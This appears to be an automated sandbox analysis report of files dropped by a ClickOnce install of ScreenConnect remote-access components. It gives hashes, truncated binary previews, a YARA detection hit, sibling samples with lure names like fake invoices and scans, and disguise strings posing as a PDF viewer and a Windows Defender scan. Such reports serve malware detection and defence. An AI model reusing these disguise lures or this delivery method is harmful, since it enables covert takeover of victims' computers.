                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):61216
                                                                                                                                                                                                                                                                        Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                                        MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                                        SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                                        SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                                        SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                        • Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: E_BILL0041272508.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: He6pI1bhcA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: VD01NDHM8u.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: vovE92JSzK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        • Filename: s9POKY8U8k.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                                        Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                        MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                        SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                        SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                        SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                                        MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                                        SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                                        SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                                        SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):548864
                                                                                                                                                                                                                                                                        Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                                        MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                                        SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                                        SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                                        SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1721856
                                                                                                                                                                                                                                                                        Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                                        MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                                        SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                                        SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                                        SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):601376
                                                                                                                                                                                                                                                                        Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                                        MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                                        SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                                        SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                                                        Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                                        MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                                        SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                                        SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                                        SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.en-US.resources

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):464
                                                                                                                                                                                                                                                                        Entropy (8bit):4.856168973028116
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:rHy2DLI4MWozmO5OItfU49cA8RMZRCl13dMHcJRx74:zHE4uM2xbZRpkRxE
                                                                                                                                                                                                                                                                        MD5:0DCE7F0E2345982EE860DB000753DC67
                                                                                                                                                                                                                                                                        SHA1:18E27EF165824C1B852CDFD5B3A8687BEEA132F4
                                                                                                                                                                                                                                                                        SHA-256:351BF775962568F859E12870D992A899A09C3B5A780C7DDDAA49190D8001049E
                                                                                                                                                                                                                                                                        SHA-512:B37CA7117105A48D7A476513AE207EFE8BB0717FD95A0AAB8D6AE16F76D57F392FA68BA0F0C3170E30EBEABBE1D145E4A641904676D2A0FAF27A66DCF516666E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_Q2T}Z...5.......c...0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.L.....PDF Viewer.>Software is updating... Please do not turn off your computer!...Microsoft Windows Defender Scan

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.Override.resources

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):93109
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9618781891916806
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:PuVZ7zoDDZuVZ7zoDDx7zoDDx7zoDDx7zoDDx7zoDDX:PGZ3CtGZ3Cl3Cl3Cl3Cl3C7
                                                                                                                                                                                                                                                                        MD5:764E92734733E81FA036A56EA784112F
                                                                                                                                                                                                                                                                        SHA1:1CE8D8DD183C43ADB38D8F6DEFC525CC093D08EC
                                                                                                                                                                                                                                                                        SHA-256:7108F7790C144DCD4BF81E49BAE5924CC3D1050DDF697F9EAE06E2A1AD95EB37
                                                                                                                                                                                                                                                                        SHA-512:031B163839D00EBEC6D335E53CBACCD8ADB0A25417A67780BE91827C20DFD25D0CE84F37E114FD3F4D8D1A3A54A35A73088E0AB744863BF45812E61CEFE8826F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2..C.."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8..O..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6....(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.%...0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.t...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..0..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r..i.. .....PNG........IHDR...h...z........v....PLTE.w........j.N.......2...=IDATx....b.8..`'J..J....bdX'!.:..:...?..7...]~.RG..d\..z*.lK..62.6/v.....hg..w)!....ci.....).Fo.....*.{....S7...#.(*...GH...E4&.G.Q.l..N.......~..(.j....q..'..k@'...;h...(.D...~Q.t..8.uv.oT.E..j....c..*v..|..Y.:B...4y.Q$..Ed74......&5...!.u....Z.iP4..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\Client.en-US.resources

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):50133
                                                                                                                                                                                                                                                                        Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                                        MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                                        SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                                        SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                                        SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                                        Malicious:false
